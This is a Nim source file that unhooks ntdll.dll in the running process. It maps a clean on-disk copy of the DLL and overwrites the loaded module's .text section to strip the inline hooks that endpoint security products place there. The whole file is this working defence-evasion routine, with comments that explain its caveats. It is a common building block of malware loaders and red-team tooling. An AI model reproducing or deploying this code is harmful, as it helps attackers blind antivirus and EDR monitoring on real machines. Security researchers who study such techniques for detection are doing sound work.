import os
import strformat
import strutils
import ptr_math
import winim
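proc toString(bytes: openArray[byte]): string =
  ## Copy a raw byte buffer into a string byte for byte (no NUL trimming).
  ## Used below to read the 8-byte, not necessarily NUL-terminated, PE
  ## section name.
  result = newString(bytes.len)
  # An empty buffer has no element 0 to take the address of, so skip the copy
  # instead of tripping the bounds check.
  if bytes.len > 0:
    copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)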
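proc ntdllunhook(): bool =
  ## Overwrite the `.text` section of the ntdll.dll loaded in this process
  ## with the `.text` of a fresh SEC_IMAGE mapping of the on-disk file,
  ## removing any inline hooks that were patched into the loaded copy.
  ##
  ## Returns true when a `.text` section was found and rewritten; returns
  ## false after printing the reason otherwise. The file, the mapping object
  ## and the mapped view are released on every path (success or failure).
  ##
  ## Caveats for anyone relying on this:
  ## * `.text` is re-protected to PAGE_EXECUTE_READWRITE and written with a
  ##   plain memcpy; both steps are observable by anything monitoring this
  ##   process, and nothing here attempts to hide them.
  ## * The bytes are taken from a view mapped at its own base, which is only
  ##   correct if `.text` contains no absolute relocations. That holds for the
  ##   x64 ntdll this was written against; confirm before trusting a 32-bit
  ##   build.
  ## * Only ntdll.dll is handled; hooks in any other module are untouched.
  let ntdllModule = GetModuleHandleA("ntdll.dll")
  if ntdllModule == 0:
    echo fmt"Could not find ntdll.dll in this process ({GetLastError()})."
    return false

  # GetCurrentProcess() yields a pseudo-handle, so there is nothing to close
  var mi: MODULEINFO
  if GetModuleInformation(GetCurrentProcess(), ntdllModule, addr mi,
                          cast[DWORD](sizeof(mi))) == 0:
    echo fmt"Could not query ntdll.dll module information ({GetLastError()})."
    return false
  let ntdllBase = mi.lpBaseOfDll

  # Honour a non-default system root rather than assuming C:\windows
  let ntdllPath = getEnv("SystemRoot", "C:\\windows") & "\\system32\\ntdll.dll"
  var ntdllFileObj: File
  try:
    ntdllFileObj = open(ntdllPath, fmRead)
  except IOError as e:
    echo fmt"Could not open {ntdllPath} ({e.msg})."
    return false
  # Closing the File closes the OS handle it wraps; do not CloseHandle it too,
  # that would leave the File object dangling on an already-closed handle.
  defer: close(ntdllFileObj)

  let ntdllFile = getOsFileHandle(ntdllFileObj)
  # PAGE_READONLY or SEC_IMAGE (0x02 or 0x1000000): map the file the way the
  # loader lays it out, so section RVAs line up with the module in memory.
  let ntdllMapping = CreateFileMapping(ntdllFile, NULL,
                                       PAGE_READONLY or SEC_IMAGE, 0, 0, NULL)
  if ntdllMapping == 0:
    echo fmt"Could not create file mapping object ({GetLastError()})."
    return false
  defer: discard CloseHandle(ntdllMapping)

  let ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0)
  if ntdllMappingAddress.isNil:
    echo fmt"Could not map view of file ({GetLastError()})."
    return false
  defer: discard UnmapViewOfFile(ntdllMappingAddress)

  # Walk the section table of the *loaded* module; the clean view shares its
  # RVAs, so the same offsets index both images.
  let hookedDosHeader = cast[PIMAGE_DOS_HEADER](ntdllBase)
  if hookedDosHeader.e_magic != IMAGE_DOS_SIGNATURE:
    echo "Loaded ntdll.dll has no valid DOS header."
    return false
  let hookedNtHeader = cast[PIMAGE_NT_HEADERS](cast[DWORD_PTR](ntdllBase) + hookedDosHeader.e_lfanew)
  if hookedNtHeader.Signature != IMAGE_NT_SIGNATURE:
    echo "Loaded ntdll.dll has no valid NT header."
    return false

  var restored = false
  for section in 0'u16 ..< hookedNtHeader.FileHeader.NumberOfSections:
    let hookedSectionHeader = cast[PIMAGE_SECTION_HEADER](
      cast[DWORD_PTR](IMAGE_FIRST_SECTION(hookedNtHeader)) +
      cast[DWORD_PTR](IMAGE_SIZEOF_SECTION_HEADER * section))
    if ".text" notin toString(hookedSectionHeader.Name):
      continue
    let textAddr = ntdllBase + hookedSectionHeader.VirtualAddress
    let textSize = hookedSectionHeader.Misc.VirtualSize
    var oldProtection: DWORD = 0
    # Code pages are not writable; open them up just long enough for the copy
    if VirtualProtect(textAddr, textSize, PAGE_EXECUTE_READWRITE,
                      addr oldProtection) == 0:
      echo fmt"Failed calling VirtualProtect ({GetLastError()})."
      return false
    copyMem(textAddr, ntdllMappingAddress + hookedSectionHeader.VirtualAddress, textSize)
    if VirtualProtect(textAddr, textSize, oldProtection, addr oldProtection) == 0:
      echo fmt"Failed resetting memory back to it's orignal protections ({GetLastError()})."
      return false
    restored = true

  if not restored:
    echo "No .text section found in ntdll.dll; nothing was restored."
  # GetModuleHandleA does not add a reference to the module, so there is no
  # FreeLibrary to balance here.
  return restored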
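when isMainModule:
  # Run the unhook against the current process and report whether the
  # `.text` section of ntdll.dll was actually restored.
  let unhooked = ntdllunhook()
  echo fmt"[*] unhook Ntdll: {unhooked}"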